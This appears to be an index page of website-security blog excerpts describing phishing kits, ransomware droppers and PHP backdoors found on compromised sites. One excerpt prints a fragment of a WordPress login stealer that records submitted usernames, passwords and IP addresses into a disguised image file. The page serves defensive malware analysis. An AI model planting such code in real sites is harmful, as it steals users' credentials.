Fake SSO Used In Multi-Email Provider Phishing
Luke Leal Single sign-on (SSO) allows users to sign into a single account (e.g Google) and access other services like YouTube or Gmail without authenticating with a…
Fake Human Verification Spam
We recently released an update to our Labs Knowledgebase for new plugins that had been targeted during the month of July 2019. One of these…
How Domain Expiration Can Potentially Disrupt Other Websites
A website owner recently reached out to us about a pop-up advertisement problem on their website which occurred any time someone clicked anywhere on the…
Troldesh Ransomware Dropper
Over the past few weeks, we’ve seen an increase in Troldesh ransomware using compromised websites as intermediary malware distributors. The malware often uses a PHP…
Hydro-Quebec phishing
We have found an interesting phishing kit containing numerous phishing pages which target large, popular brands like Amazon and Paypal. What was interesting about this…
New variant of “trollherten” malware
We continue to see new variations of obfuscation used to hide a PHP backdoor that began to be heavily used by malicious users in late…
Yet another variant of the cPanel user shadow editor malware
We have discovered a new variant of PHP malware used to edit a cPanel users’s shadow file, allowing for bad actors to change passwords for…
Reverse Hardening WordPress Config
Hardening is the process of securing a website or system against known security weaknesses or potential issues to reduce the attack surface. The more functions…
Simple but effective backdoor
We recently found a malicious PHP file containing a small amount of code that is effective at hiding from detection by various server side scanning…
Simple WP login stealer
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
“Loader for Secured Files” and arrayed b374k shell encoding
This file (33×77.php) was detected in the document root of a website during a website cleanup for a client. It demonstrates how hackers sometimes use…